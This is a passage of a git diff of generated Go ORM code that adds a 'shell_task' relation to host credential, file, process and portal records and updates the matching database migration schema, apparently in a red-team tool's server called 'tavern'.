&sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := hpu.mutation.ShellTaskIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostprocess.ShellTaskTable, + Columns: []string{hostprocess.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } if n, err = sqlgraph.UpdateNodes(ctx, hpu.driver, _spec); err != nil { if _, ok := err.(*sqlgraph.NotFoundError); ok { err = &NotFoundError{hostprocess.Label} @@ -622,11 +682,38 @@ func (hpuo *HostProcessUpdateOne) SetTaskID(id int) *HostProcessUpdateOne { return hpuo } +// SetNillableTaskID sets the "task" edge to the Task entity by ID if the given value is not nil. +func (hpuo *HostProcessUpdateOne) SetNillableTaskID(id *int) *HostProcessUpdateOne { + if id != nil { + hpuo = hpuo.SetTaskID(*id) + } + return hpuo +} + // SetTask sets the "task" edge to the Task entity. func (hpuo *HostProcessUpdateOne) SetTask(t *Task) *HostProcessUpdateOne { return hpuo.SetTaskID(t.ID) } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by ID. +func (hpuo *HostProcessUpdateOne) SetShellTaskID(id int) *HostProcessUpdateOne { + hpuo.mutation.SetShellTaskID(id) + return hpuo +} + +// SetNillableShellTaskID sets the "shell_task" edge to the ShellTask entity by ID if the given value is not nil. +func (hpuo *HostProcessUpdateOne) SetNillableShellTaskID(id *int) *HostProcessUpdateOne { + if id != nil { + hpuo = hpuo.SetShellTaskID(*id) + } + return hpuo +} + +// SetShellTask sets the "shell_task" edge to the ShellTask entity. +func (hpuo *HostProcessUpdateOne) SetShellTask(s *ShellTask) *HostProcessUpdateOne { + return hpuo.SetShellTaskID(s.ID) +} + // Mutation returns the HostProcessMutation object of the builder. func (hpuo *HostProcessUpdateOne) Mutation() *HostProcessMutation { return hpuo.mutation @@ -644,6 +731,12 @@ func (hpuo *HostProcessUpdateOne) ClearTask() *HostProcessUpdateOne { return hpuo } +// ClearShellTask clears the "shell_task" edge to the ShellTask entity. +func (hpuo *HostProcessUpdateOne) ClearShellTask() *HostProcessUpdateOne { + hpuo.mutation.ClearShellTask() + return hpuo +} + // Where appends a list predicates to the HostProcessUpdate builder. func (hpuo *HostProcessUpdateOne) Where(ps ...predicate.HostProcess) *HostProcessUpdateOne { hpuo.mutation.Where(ps...) @@ -708,9 +801,6 @@ func (hpuo *HostProcessUpdateOne) check() error { if hpuo.mutation.HostCleared() && len(hpuo.mutation.HostIDs()) > 0 { return errors.New(`ent: clearing a required unique edge "HostProcess.host"`) } - if hpuo.mutation.TaskCleared() && len(hpuo.mutation.TaskIDs()) > 0 { - return errors.New(`ent: clearing a required unique edge "HostProcess.task"`) - } return nil } @@ -849,6 +939,35 @@ func (hpuo *HostProcessUpdateOne) sqlSave(ctx context.Context) (_node *HostProce } _spec.Edges.Add = append(_spec.Edges.Add, edge) } + if hpuo.mutation.ShellTaskCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostprocess.ShellTaskTable, + Columns: []string{hostprocess.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := hpuo.mutation.ShellTaskIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: true, + Table: hostprocess.ShellTaskTable, + Columns: []string{hostprocess.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } _node = &HostProcess{config: hpuo.config} _spec.Assign = _node.assignValues _spec.ScanValues = _node.scanValues diff --git a/tavern/internal/ent/migrate/schema.go b/tavern/internal/ent/migrate/schema.go index bb18799d4..7fddd7d71 100644 --- a/tavern/internal/ent/migrate/schema.go +++ b/tavern/internal/ent/migrate/schema.go @@ -158,6 +158,7 @@ var ( {Name: "secret", Type: field.TypeString, SchemaType: map[string]string{"mysql": "LONGTEXT"}}, {Name: "kind", Type: field.TypeEnum, Enums: []string{"KIND_NTLM_HASH", "KIND_PASSWORD", "KIND_SSH_KEY", "KIND_UNSPECIFIED"}}, {Name: "host_credential_host", Type: field.TypeInt}, + {Name: "shell_task_reported_credentials", Type: field.TypeInt, Nullable: true}, {Name: "task_reported_credentials", Type: field.TypeInt, Nullable: true}, } // HostCredentialsTable holds the schema information for the "host_credentials" table. @@ -173,8 +174,14 @@ var ( OnDelete: schema.Cascade, }, { - Symbol: "host_credentials_tasks_reported_credentials", + Symbol: "host_credentials_shell_tasks_reported_credentials", Columns: []*schema.Column{HostCredentialsColumns[7]}, + RefColumns: []*schema.Column{ShellTasksColumns[0]}, + OnDelete: schema.Cascade, + }, + { + Symbol: "host_credentials_tasks_reported_credentials", + Columns: []*schema.Column{HostCredentialsColumns[8]}, RefColumns: []*schema.Column{TasksColumns[0]}, OnDelete: schema.SetNull, }, @@ -194,7 +201,8 @@ var ( {Name: "content", Type: field.TypeBytes, Nullable: true, SchemaType: map[string]string{"mysql": "LONGBLOB"}}, {Name: "host_files", Type: field.TypeInt, Nullable: true}, {Name: "host_file_host", Type: field.TypeInt}, - {Name: "task_reported_files", Type: field.TypeInt}, + {Name: "shell_task_reported_files", Type: field.TypeInt, Nullable: true}, + {Name: "task_reported_files", Type: field.TypeInt, Nullable: true}, } // HostFilesTable holds the schema information for the "host_files" table. HostFilesTable = &schema.Table{ @@ -215,10 +223,16 @@ var ( OnDelete: schema.Cascade, }, { - Symbol: "host_files_tasks_reported_files", + Symbol: "host_files_shell_tasks_reported_files", Columns: []*schema.Column{HostFilesColumns[12]}, + RefColumns: []*schema.Column{ShellTasksColumns[0]}, + OnDelete: schema.Cascade, + }, + { + Symbol: "host_files_tasks_reported_files", + Columns: []*schema.Column{HostFilesColumns[13]}, RefColumns: []*schema.Column{TasksColumns[0]}, - OnDelete: schema.NoAction, + OnDelete: schema.SetNull, }, }, } @@ -238,7 +252,8 @@ var ( {Name: "status", Type: field.TypeEnum, Enums: []string{"STATUS_DEAD", "STATUS_IDLE", "STATUS_LOCK_BLOCKED", "STATUS_PARKED", "STATUS_RUN", "STATUS_SLEEP", "STATUS_STOP", "STATUS_TRACING", "STATUS_UNINTERUPTIBLE_DISK_SLEEP", "STATUS_UNKNOWN", "STATUS_UNSPECIFIED", "STATUS_WAKE_KILL", "STATUS_WAKING", "STATUS_ZOMBIE"}}, {Name: "host_processes", Type: field.TypeInt, Nullable: true}, {Name: "host_process_host", Type: field.TypeInt}, - {Name: "task_reported_processes", Type: field.TypeInt}, + {Name: "shell_task_reported_processes", Type: field.TypeInt, Nullable: true}, + {Name: "task_reported_processes", Type: field.TypeInt, Nullable: true}, } // HostProcessesTable holds the schema information for the "host_processes" table. HostProcessesTable = &schema.Table{ @@ -259,10 +274,16 @@ var ( OnDelete: schema.Cascade, }, { - Symbol: "host_processes_tasks_reported_processes", + Symbol: "host_processes_shell_tasks_reported_processes", Columns: []*schema.Column{HostProcessesColumns[14]}, + RefColumns: []*schema.Column{ShellTasksColumns[0]}, + OnDelete: schema.Cascade, + }, + { + Symbol: "host_processes_tasks_reported_processes", + Columns: []*schema.Column{HostProcessesColumns[15]}, RefColumns: []*schema.Column{TasksColumns[0]}, - OnDelete: schema.NoAction, + OnDelete: schema.SetNull, }, }, } @@ -304,7 +325,8 @@ var ( {Name: "created_at", Type: field.TypeTime}, {Name: "last_modified_at", Type: field.TypeTime}, {Name: "closed_at", Type: field.TypeTime, Nullable: true}, - {Name: "portal_task", Type: field.TypeInt}, + {Name: "portal_task", Type: field.TypeInt, Nullable: true}, + {Name: "portal_shell_task", Type: field.TypeInt, Nullable: true}, {Name: "portal_beacon", Type: field.TypeInt}, {Name: "portal_owner", Type: field.TypeInt}, {Name: "shell_portals", Type: field.TypeInt, Nullable: true}, @@ -319,23 +341,29 @@ var ( Symbol: "portals_tasks_task", Columns: []*schema.Column{PortalsColumns[4]}, RefColumns: []*schema.Column{TasksColumns[0]}, - OnDelete: schema.NoAction, + OnDelete: schema.SetNull, }, { - Symbol: "portals_beacons_beacon", + Symbol: "portals_shell_tasks_shell_task", Columns: []*schema.Column{PortalsColumns[5]}, + RefColumns: []*schema.Column{ShellTasksColumns[0]}, + OnDelete: schema.SetNull, + }, + { + Symbol: "portals_beacons_beacon", + Columns: []*schema.Column{PortalsColumns[6]}, RefColumns: []*schema.Column{BeaconsColumns[0]}, OnDelete: schema.NoAction, }, { Symbol: "portals_users_owner", - Columns: []*schema.Column{PortalsColumns[6]}, + Columns: []*schema.Column{PortalsColumns[7]}, RefColumns: []*schema.Column{UsersColumns[0]}, OnDelete: schema.NoAction, }, { Symbol: "portals_shells_portals", - Columns: []*schema.Column{PortalsColumns[7]}, + Columns: []*schema.Column{PortalsColumns[8]}, RefColumns: []*schema.Column{ShellsColumns[0]}, OnDelete: schema.SetNull, }, @@ -712,19 +740,22 @@ func init() { Collation: "utf8mb4_general_ci", } HostCredentialsTable.ForeignKeys[0].RefTable = HostsTable - HostCredentialsTable.ForeignKeys[1].RefTable = TasksTable + HostCredentialsTable.ForeignKeys[1].RefTable = ShellTasksTable + HostCredentialsTable.ForeignKeys[2].RefTable = TasksTable HostCredentialsTable.Annotation = &entsql.Annotation{ Collation: "utf8mb4_general_ci", } HostFilesTable.ForeignKeys[0].RefTable = HostsTable HostFilesTable.ForeignKeys[1].RefTable = HostsTable - HostFilesTable.ForeignKeys[2].RefTable = TasksTable + HostFilesTable.ForeignKeys[2].RefTable = ShellTasksTable + HostFilesTable.ForeignKeys[3].RefTable = TasksTable HostFilesTable.Annotation = &entsql.Annotation{ Collation: "utf8mb4_general_ci", } HostProcessesTable.ForeignKeys[0].RefTable = HostsTable HostProcessesTable.ForeignKeys[1].RefTable = HostsTable - HostProcessesTable.ForeignKeys[2].RefTable = TasksTable + HostProcessesTable.ForeignKeys[2].RefTable = ShellTasksTable + HostProcessesTable.ForeignKeys[3].RefTable = TasksTable HostProcessesTable.Annotation = &entsql.Annotation{ Collation: "utf8mb4_general_ci", } @@ -734,9 +765,10 @@ func init() { Collation: "utf8mb4_general_ci", } PortalsTable.ForeignKeys[0].RefTable = TasksTable - PortalsTable.ForeignKeys[1].RefTable = BeaconsTable - PortalsTable.ForeignKeys[2].RefTable = UsersTable - PortalsTable.ForeignKeys[3].RefTable = ShellsTable + PortalsTable.ForeignKeys[1].RefTable = ShellTasksTable + PortalsTable.ForeignKeys[2].RefTable = BeaconsTable + PortalsTable.ForeignKeys[3].RefTable = UsersTable + PortalsTable.ForeignKeys[4].RefTable = ShellsTable PortalsTable.Annotation = &entsql.Annotation{ Collation: "utf8mb4_general_ci", } diff --git a/tavern/internal/ent/mutation.go b/tavern/internal/ent/mutation.go index 44d71c3eb..74c3896b3 100644 --- a/tavern/internal/ent/mutation.go +++ b/tavern/internal/ent/mutation.go @@ -5641,22 +5641,24 @@ func (m *HostMutation) ResetEdge(name string) error { // HostCredentialMutation represents an operation that mutates the HostCredential nodes in the graph. type HostCredentialMutation struct { config - op Op - typ string - id *int - created_at *time.Time - last_modified_at *time.Time - principal *string - secret *string - kind *epb.Credential_Kind - clearedFields map[string]struct{} - host *int - clearedhost bool - task *int - clearedtask bool - done bool - oldValue func(context.Context) (*HostCredential, error) - predicates []predicate.HostCredential + op Op + typ string + id *int + created_at *time.Time + last_modified_at *time.Time + principal *string + secret *string + kind *epb.Credential_Kind + clearedFields map[string]struct{} + host *int + clearedhost bool + task *int + clearedtask bool + shell_task *int + clearedshell_task bool + done bool + oldValue func(context.Context) (*HostCredential, error) + predicates []predicate.HostCredential } var _ ent.Mutation = (*HostCredentialMutation)(nil) @@ -6015,6 +6017,45 @@ func (m *HostCredentialMutation) ResetTask() { m.clearedtask = false } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by id. +func (m *HostCredentialMutation) SetShellTaskID(id int) { + m.shell_task = &id +} + +// ClearShellTask clears the "shell_task" edge to the ShellTask entity. +func (m *HostCredentialMutation) ClearShellTask() { + m.clearedshell_task = true +} + +// ShellTaskCleared reports if the "shell_task" edge to the ShellTask entity was cleared. +func (m *HostCredentialMutation) ShellTaskCleared() bool { + return m.clearedshell_task +} + +// ShellTaskID returns the "shell_task" edge ID in the mutation. +func (m *HostCredentialMutation) ShellTaskID() (id int, exists bool) { + if m.shell_task != nil { + return *m.shell_task, true + } + return +} + +// ShellTaskIDs returns the "shell_task" edge IDs in the mutation. +// Note that IDs always returns len(IDs) <= 1 for unique edges, and you should use +// ShellTaskID instead. It exists only for internal usage by the builders. +func (m *HostCredentialMutation) ShellTaskIDs() (ids []int) { + if id := m.shell_task; id != nil { + ids = append(ids, *id) + } + return +} + +// ResetShellTask resets all changes to the "shell_task" edge. +func (m *HostCredentialMutation) ResetShellTask() { + m.shell_task = nil + m.clearedshell_task = false +} + // Where appends a list predicates to the HostCredentialMutation builder. func (m *HostCredentialMutation) Where(ps ...predicate.HostCredential) { m.predicates = append(m.predicates, ps...) @@ -6216,13 +6257,16 @@ func (m *HostCredentialMutation) ResetField(name string) error { // AddedEdges returns all edge names that were set/added in this mutation. func (m *HostCredentialMutation) AddedEdges() []string { - edges := make([]string, 0, 2) + edges := make([]string, 0, 3) if m.host != nil { edges = append(edges, hostcredential.EdgeHost) } if m.task != nil { edges = append(edges, hostcredential.EdgeTask) } + if m.shell_task != nil { + edges = append(edges, hostcredential.EdgeShellTask) + } return edges } @@ -6238,13 +6282,17 @@ func (m *HostCredentialMutation) AddedIDs(name string) []ent.Value { if id := m.task; id != nil { return []ent.Value{*id} } + case hostcredential.EdgeShellTask: + if id := m.shell_task; id != nil { + return []ent.Value{*id} + } } return nil } // RemovedEdges returns all edge names that were removed in this mutation. func (m *HostCredentialMutation) RemovedEdges() []string { - edges := make([]string, 0, 2) + edges := make([]string, 0, 3) return edges } @@ -6256,13 +6304,16 @@ func (m *HostCredentialMutation) RemovedIDs(name string) []ent.Value { // ClearedEdges returns all edge names that were cleared in this mutation. func (m *HostCredentialMutation) ClearedEdges() []string { - edges := make([]string, 0, 2) + edges := make([]string, 0, 3) if m.clearedhost { edges = append(edges, hostcredential.EdgeHost) } if m.clearedtask { edges = append(edges, hostcredential.EdgeTask) } + if m.clearedshell_task { + edges = append(edges, hostcredential.EdgeShellTask) + } return edges } @@ -6274,6 +6325,8 @@ func (m *HostCredentialMutation) EdgeCleared(name string) bool { return m.clearedhost case hostcredential.EdgeTask: return m.clearedtask + case hostcredential.EdgeShellTask: + return m.clearedshell_task } return false } @@ -6288,6 +6341,9 @@ func (m *HostCredentialMutation) ClearEdge(name string) error { case hostcredential.EdgeTask: m.ClearTask() return nil + case hostcredential.EdgeShellTask: + m.ClearShellTask() + return nil } return fmt.Errorf("unknown HostCredential unique edge %s", name) } @@ -6302,6 +6358,9 @@ func (m *HostCredentialMutation) ResetEdge(name string) error { case hostcredential.EdgeTask: m.ResetTask() return nil + case hostcredential.EdgeShellTask: + m.ResetShellTask() + return nil } return fmt.Errorf("unknown HostCredential edge %s", name) } @@ -6309,27 +6368,29 @@ func (m *HostCredentialMutation) ResetEdge(name string) error { // HostFileMutation represents an operation that mutates the HostFile nodes in the graph. type HostFileMutation struct { config - op Op - typ string - id *int - created_at *time.Time - last_modified_at *time.Time - _path *string - owner *string - group *string - permissions *string - size *uint64 - addsize *int64 - hash *string - content *[]byte - clearedFields map[string]struct{} - host *int - clearedhost bool - task *int - clearedtask bool - done bool - oldValue func(context.Context) (*HostFile, error) - predicates []predicate.HostFile + op Op + typ string + id *int + created_at *time.Time + last_modified_at *time.Time + _path *string + owner *string + group *string + permissions *string + size *uint64 + addsize *int64 + hash *string + content *[]byte + clearedFields map[string]struct{} + host *int + clearedhost bool + task *int + clearedtask bool + shell_task *int + clearedshell_task bool + done bool + oldValue func(context.Context) (*HostFile, error) + predicates []predicate.HostFile } var _ ent.Mutation = (*HostFileMutation)(nil) @@ -6917,6 +6978,45 @@ func (m *HostFileMutation) ResetTask() { m.clearedtask = false } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by id. +func (m *HostFileMutation) SetShellTaskID(id int) { + m.shell_task = &id +} + +// ClearShellTask clears the "shell_task" edge to the ShellTask entity. +func (m *HostFileMutation) ClearShellTask() { + m.clearedshell_task = true +} + +// ShellTaskCleared reports if the "shell_task" edge to the ShellTask entity was cleared. +func (m *HostFileMutation) ShellTaskCleared() bool { + return m.clearedshell_task +} + +// ShellTaskID returns the "shell_task" edge ID in the mutation. +func (m *HostFileMutation) ShellTaskID() (id int, exists bool) { + if m.shell_task != nil { + return *m.shell_task, true + } + return +} + +// ShellTaskIDs returns the "shell_task" edge IDs in the mutation. +// Note that IDs always returns len(IDs) <= 1 for unique edges, and you should use +// ShellTaskID instead. It exists only for internal usage by the builders. +func (m *HostFileMutation) ShellTaskIDs() (ids []int) { + if id := m.shell_task; id != nil { + ids = append(ids, *id) + } + return +} + +// ResetShellTask resets all changes to the "shell_task" edge. +func (m *HostFileMutation) ResetShellTask() { + m.shell_task = nil + m.clearedshell_task = false +} + // Where appends a list predicates to the HostFileMutation builder. func (m *HostFileMutation) Where(ps ...predicate.HostFile) { m.predicates = append(m.predicates, ps...) @@ -7234,13 +7334,16 @@ func (m *HostFileMutation) ResetField(name string) error { // AddedEdges returns all edge names that were set/added in this mutation. func (m *HostFileMutation) AddedEdges() []string { - edges := make([]string, 0, 2) + edges := make([]string, 0, 3) if m.host != nil { edges = append(edges, hostfile.EdgeHost) } if m.task != nil { edges = append(edges, hostfile.EdgeTask) } + if m.shell_task != nil { + edges = append(edges, hostfile.EdgeShellTask) + } return edges } @@ -7256,13 +7359,17 @@ func (m *HostFileMutation) AddedIDs(name string) []ent.Value { if id := m.task; id != nil { return []ent.Value{*id} } + case hostfile.EdgeShellTask: + if id := m.shell_task; id != nil { + return []ent.Value{*id} + } } return nil } // RemovedEdges returns all edge names that were removed in this mutation. func (m *HostFileMutation) RemovedEdges() []string { - edges := make([]string, 0, 2) + edges := make([]string, 0, 3) return edges } @@ -7274,13 +7381,16 @@ func (m *HostFileMutation) RemovedIDs(name string) []ent.Value { // ClearedEdges returns all edge names that were cleared in this mutation. func (m *HostFileMutation) ClearedEdges() []string { - edges := make([]string, 0, 2) + edges := make([]string, 0, 3) if m.clearedhost { edges = append(edges, hostfile.EdgeHost) } if m.clearedtask { edges = append(edges, hostfile.EdgeTask) } + if m.clearedshell_task { + edges = append(edges, hostfile.EdgeShellTask) + } return edges } @@ -7292,6 +7402,8 @@ func (m *HostFileMutation) EdgeCleared(name string) bool { return m.clearedhost case hostfile.EdgeTask: return m.clearedtask + case hostfile.EdgeShellTask: + return m.clearedshell_task } return false } @@ -7306,6 +7418,9 @@ func (m *HostFileMutation) ClearEdge(name string) error { case hostfile.EdgeTask: m.ClearTask() return nil + case hostfile.EdgeShellTask: + m.ClearShellTask() + return nil } return fmt.Errorf("unknown HostFile unique edge %s", name) } @@ -7320,6 +7435,9 @@ func (m *HostFileMutation) ResetEdge(name string) error { case hostfile.EdgeTask: m.ResetTask() return nil + case hostfile.EdgeShellTask: + m.ResetShellTask() + return nil } return fmt.Errorf("unknown HostFile edge %s", name) } @@ -7327,30 +7445,32 @@ func (m *HostFileMutation) ResetEdge(name string) error { // HostProcessMutation represents an operation that mutates the HostProcess nodes in the graph. type HostProcessMutation struct { config - op Op - typ string - id *int - created_at *time.Time - last_modified_at *time.Time - pid *uint64 - addpid *int64 - ppid *uint64 - addppid *int64 - name *string - principal *string - _path *string - cmd *string - env *string - cwd *string - status *epb.Process_Status - clearedFields map[string]struct{} - host *int - clearedhost bool - task *int - clearedtask bool - done bool - oldValue func(context.Context) (*HostProcess, error) - predicates []predicate.HostProcess + op Op + typ string + id *int + created_at *time.Time + last_modified_at *time.Time + pid *uint64 + addpid *int64 + ppid *uint64 + addppid *int64 + name *string + principal *string + _path *string + cmd *string + env *string + cwd *string + status *epb.Process_Status + clearedFields map[string]struct{} + host *int + clearedhost bool + task *int + clearedtask bool + shell_task *int + clearedshell_task bool + done bool + oldValue func(context.Context) (*HostProcess, error) + predicates []predicate.HostProcess } var _ ent.Mutation = (*HostProcessMutation)(nil) @@ -8017,6 +8137,45 @@ func (m *HostProcessMutation) ResetTask() { m.clearedtask = false } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by id. +func (m *HostProcessMutation) SetShellTaskID(id int) { + m.shell_task = &id +} + +// ClearShellTask clears the "shell_task" edge to the ShellTask entity. +func (m *HostProcessMutation) ClearShellTask() { + m.clearedshell_task = true +} + +// ShellTaskCleared reports if the "shell_task" edge to the ShellTask entity was cleared. +func (m *HostProcessMutation) ShellTaskCleared() bool { + return m.clearedshell_task +} + +// ShellTaskID returns the "shell_task" edge ID in the mutation. +func (m *HostProcessMutation) ShellTaskID() (id int, exists bool) { + if m.shell_task != nil { + return *m.shell_task, true + } + return +} + +// ShellTaskIDs returns the "shell_task" edge IDs in the mutation. +// Note that IDs always returns len(IDs) <= 1 for unique edges, and you should use +// ShellTaskID instead. It exists only for internal usage by the builders. +func (m *HostProcessMutation) ShellTaskIDs() (ids []int) { + if id := m.shell_task; id != nil { + ids = append(ids, *id) + } + return +} + +// ResetShellTask resets all changes to the "shell_task" edge. +func (m *HostProcessMutation) ResetShellTask() { + m.shell_task = nil + m.clearedshell_task = false +} + // Where appends a list predicates to the HostProcessMutation builder. func (m *HostProcessMutation) Where(ps ...predicate.HostProcess) { m.predicates = append(m.predicates, ps...) @@ -8374,13 +8533,16 @@ func (m *HostProcessMutation) ResetField(name string) error { // AddedEdges returns all edge names that were set/added in this mutation. func (m *HostProcessMutation) AddedEdges() []string { - edges := make([]string, 0, 2) + edges := make([]string, 0, 3) if m.host != nil { edges = append(edges, hostprocess.EdgeHost) } if m.task != nil { edges = append(edges, hostprocess.EdgeTask) } + if m.shell_task != nil { + edges = append(edges, hostprocess.EdgeShellTask) + } return edges } @@ -8396,13 +8558,17 @@ func (m *HostProcessMutation) AddedIDs(name string) []ent.Value { if id := m.task; id != nil { return []ent.Value{*id} } + case hostprocess.EdgeShellTask: + if id := m.shell_task; id != nil { + return []ent.Value{*id} + } } return nil } // RemovedEdges returns all edge names that were removed in this mutation. func (m *HostProcessMutation) RemovedEdges() []string { - edges := make([]string, 0, 2) + edges := make([]string, 0, 3) return edges } @@ -8414,13 +8580,16 @@ func (m *HostProcessMutation) RemovedIDs(name string) []ent.Value { // ClearedEdges returns all edge names that were cleared in this mutation. func (m *HostProcessMutation) ClearedEdges() []string { - edges := make([]string, 0, 2) + edges := make([]string, 0, 3) if m.clearedhost { edges = append(edges, hostprocess.EdgeHost) } if m.clearedtask { edges = append(edges, hostprocess.EdgeTask) } + if m.clearedshell_task { + edges = append(edges, hostprocess.EdgeShellTask) + } return edges } @@ -8432,6 +8601,8 @@ func (m *HostProcessMutation) EdgeCleared(name string) bool { return m.clearedhost case hostprocess.EdgeTask: return m.clearedtask + case hostprocess.EdgeShellTask: + return m.clearedshell_task } return false } @@ -8446,6 +8617,9 @@ func (m *HostProcessMutation) ClearEdge(name string) error { case hostprocess.EdgeTask: m.ClearTask() return nil + case hostprocess.EdgeShellTask: + m.ClearShellTask() + return nil } return fmt.Errorf("unknown HostProcess unique edge %s", name) } @@ -8460,6 +8634,9 @@ func (m *HostProcessMutation) ResetEdge(name string) error { case hostprocess.EdgeTask: m.ResetTask() return nil + case hostprocess.EdgeShellTask: + m.ResetShellTask() + return nil } return fmt.Errorf("unknown HostProcess edge %s", name) } @@ -9290,6 +9467,8 @@ type PortalMutation struct { clearedFields map[string]struct{} task *int clearedtask bool + shell_task *int + clearedshell_task bool beacon *int clearedbeacon bool owner *int @@ -9560,6 +9739,45 @@ func (m *PortalMutation) ResetTask() { m.clearedtask = false } +// SetShellTaskID sets the "shell_task" edge to the ShellTask entity by id. +func (m *PortalMutation) SetShellTaskID(id int) { + m.shell_task = &id +} + +// ClearShellTask clears the "shell_task" edge to the ShellTask entity. +func (m *PortalMutation) ClearShellTask() { + m.clearedshell_task = true +} + +// ShellTaskCleared reports if the "shell_task" edge to the ShellTask entity was cleared. +func (m *PortalMutation) ShellTaskCleared() bool { + return m.clearedshell_task +} + +// ShellTaskID returns the "shell_task" edge ID in the mutation. +func (m *PortalMutation) ShellTaskID() (id int, exists bool) { + if m.shell_task != nil { + return *m.shell_task, true + } + return +} + +// ShellTaskIDs returns the "shell_task" edge IDs in the mutation. +// Note that IDs always returns len(IDs) <= 1 for unique edges, and you should use +// ShellTaskID instead. It exists only for internal usage by the builders. +func (m *PortalMutation) ShellTaskIDs() (ids []int) { + if id := m.shell_task; id != nil { + ids = append(ids, *id) + } + return +} + +// ResetShellTask resets all changes to the "shell_task" edge. +func (m *PortalMutation) ResetShellTask() { + m.shell_task = nil + m.clearedshell_task = false +} + // SetBeaconID sets the "beacon" edge to the Beacon entity by id. func (m *PortalMutation) SetBeaconID(id int) { m.beacon = &id @@ -9868,10 +10086,13 @@ func (m *PortalMutation) ResetField(name string) error { // AddedEdges returns all edge names that were set/added in this mutation. func (m *PortalMutation) AddedEdges() []string { - edges := make([]string, 0, 4) + edges := make([]string, 0, 5) if m.task != nil { edges = append(edges, portal.EdgeTask) } + if m.shell_task != nil { + edges = append(edges, portal.EdgeShellTask) + } if m.beacon != nil { edges = append(edges, portal.EdgeBeacon) } @@ -9892,6 +10113,10 @@ func (m *PortalMutation) AddedIDs(name string) []ent.Value { if id := m.task; id != nil { return []ent.Value{*id} } + case portal.EdgeShellTask: + if id := m.shell_task; id != nil { + return []ent.Value{*id} + } case portal.EdgeBeacon: if id := m.beacon; id != nil { return []ent.Value{*id} @@ -9912,7 +10137,7 @@ func (m *PortalMutation) AddedIDs(name string) []ent.Value { // RemovedEdges returns all edge names that were removed in this mutation. func (m *PortalMutation) RemovedEdges() []string { - edges := make([]string, 0, 4) + edges := make([]string, 0, 5) if m.removedactive_users != nil { edges = append(edges, portal.EdgeActiveUsers) } @@ -9935,10 +10160,13 @@ func (m *PortalMutation) RemovedIDs(name string) []ent.Value { // ClearedEdges returns all edge names that were cleared in this mutation. func (m *PortalMutation) ClearedEdges() []string { - edges := make([]string, 0, 4) + edges := make([]string, 0, 5) if m.clearedtask { edges = append(edges, portal.EdgeTask) } + if m.clearedshell_task { + edges = append(edges, portal.EdgeShellTask) + } if m.clearedbeacon { edges = append(edges, portal.EdgeBeacon) } @@ -9957,6 +10185,8 @@ func (m *PortalMutation) EdgeCleared(name string) bool { switch name { case portal.EdgeTask: return m.clearedtask + case portal.EdgeShellTask: + return m.clearedshell_task case portal.EdgeBeacon: return m.clearedbeacon case portal.EdgeOwner: @@ -9974,6 +10204,9 @@ func (m *PortalMutation) ClearEdge(name string) error { case portal.EdgeTask: m.ClearTask() return nil + case portal.EdgeShellTask: + m.ClearShellTask() + return nil case portal.EdgeBeacon: m.ClearBeacon() return nil @@ -9991,6 +10224,9 @@ func (m *PortalMutation) ResetEdge(name string) error { case portal.EdgeTask: m.ResetTask() return nil + case portal.EdgeShellTask: + m.ResetShellTask() + return nil case portal.EdgeBeacon: m.ResetBeacon() return nil @@ -12649,28 +12885,37 @@ func (m *ShellMutation) ResetEdge(name string) error { // ShellTaskMutation represents an operation that mutates the ShellTask nodes in the graph. type ShellTaskMutation struct { config - op Op - typ string - id *int - created_at *time.Time - last_modified_at *time.Time - input *string - output *string - error *string - stream_id *string - sequence_id *uint64 - addsequence_id *int64 - claimed_at *time.Time - exec_started_at *time.Time - exec_finished_at *time.Time - clearedFields map[string]struct{} - shell *int - clearedshell bool - creator *int - clearedcreator bool - done bool - oldValue func(context.Context) (*ShellTask, error) - predicates []predicate.ShellTask + op Op + typ string + id *int + created_at *time.Time + last_modified_at *time.Time + input *string + output *string + error *string + stream_id *string + sequence_id *uint64 + addsequence_id *int64 + claimed_at *time.Time + exec_started_at *time.Time + exec_finished_at *time.Time + clearedFields map[string]struct{} + shell *int + clearedshell bool + creator *int + clearedcreator bool + reported_credentials map[int]struct{} + removedreported_credentials map[int]struct{} + clearedreported_credentials bool + reported_files map[int]struct{} + removedreported_files map[int]struct{} + clearedreported_files bool + reported_processes map[int]struct{} + removedreported_processes map[int]struct{} + clearedreported_processes bool + done bool + oldValue func(context.Context) (*ShellTask, error) + predicates []predicate.ShellTask } var _ ent.Mutation = (*ShellTaskMutation)(nil) @@ -13294,6 +13539,168 @@ func (m *ShellTaskMutation) ResetCreator() { m.clearedcreator = false } +// AddReportedCredentialIDs adds the "reported_credentials" edge to the HostCredential entity by ids. +func (m *ShellTaskMutation) AddReportedCredentialIDs(ids ...int) { + if m.reported_credentials == nil { + m.reported_credentials = make(map[int]struct{}) + } + for i := range ids { + m.reported_credentials[ids[i]] = struct{}{} + } +} + +// ClearReportedCredentials clears the "reported_credentials" edge to the HostCredential entity. +func (m *ShellTaskMutation) ClearReportedCredentials() { + m.clearedreported_credentials = true +} + +// ReportedCredentialsCleared reports if the "reported_credentials" edge to the HostCredential entity was cleared. +func (m *ShellTaskMutation) ReportedCredentialsCleared() bool { + return m.clearedreported_credentials +} + +// 